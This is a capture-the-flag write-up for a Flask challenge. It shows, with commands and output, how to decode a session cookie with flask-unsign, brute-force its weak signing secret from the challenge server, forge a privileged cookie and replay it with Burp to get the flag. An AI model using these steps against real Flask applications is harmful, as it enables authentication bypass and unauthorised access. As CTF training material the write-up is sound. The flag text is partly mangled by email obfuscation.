Rating:

The website is using flask. A page is reserved for premium member.

We know that flask cookie have some issues.

We place an order. Login as toto:toto get the cookie and pass it to flask-unsign. The tool can decode it as the secret is only use to sign the cookie.

```
$flask-unsign -d -c 'eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoidG90byJ9.Xp2SeA.1l6nDFaIsDZ8bCXcxdtORRVIBK0'
{'flagship': False, 'username': 'toto'}
```

We need to get the secret to forge our own cookie

```
$ flask-unsign --server https://cookie-forge.cha.hackpack.club/orders --unsign
[*] Server returned HTTP 302 (Found)
[+] Successfully obtained session cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIllvdSBtdXN0IGxvZyBpbiBmaXJzdCEiXX1dfQ.Xp2TwA.IiGnkGfSx0j-O_vLTjmUyU95zLQ
[*] Session decodes to: {'_flashes': [('warning', 'You must log in first!')]}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 39090 attempts
'password1'
```

We modify the flagship value and sign our cookie with the secret password1

```
$ flask-unsign --sign --secret password1 --cookie "{'flagship': True, 'username': 'toto'}"
eyJmbGFnc2hpcCI6dHJ1ZSwidXNlcm5hbWUiOiJ0b3RvIn0.Xp2TRQ.XlXCKJYANDb9ghp5ms_fKQhTkVY
```

Using Burp repeater we modify our cookie to get the flag

```
GET /flag HTTP/1.1
Host: cookie-forge.cha.hackpack.club
Cookie: session=eyJmbGFnc2hpcCI6dHJ1ZSwidXNlcm5hbWUiOiJ0b3RvIn0.Xp2TRQ.XlXCKJYANDb9ghp5ms_fKQhTkVY
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-Length: 2617
Content-Type: text/html; charset=utf-8
Date: Mon, 20 Apr 2020 12:26:22 GMT
Server: meinheld/1.0.1
Vary: Cookie
<SNIP>

You are a <em>special</em> customer!
To come back for more, sugar-coma after sugar-coma, in the face of mounting pressure from your doctors,
your family, and your own common senseā€¦
That's dedication.


Just to show our appreciation for your morbid commitment to our life-altering products, we're giving you this flag:


flag{[email protected][email protected]@[email protected]_d3l1c10$0}
```

Original writeup (https://maggick.fr/2020/04/hackpack-ctf-2020.html).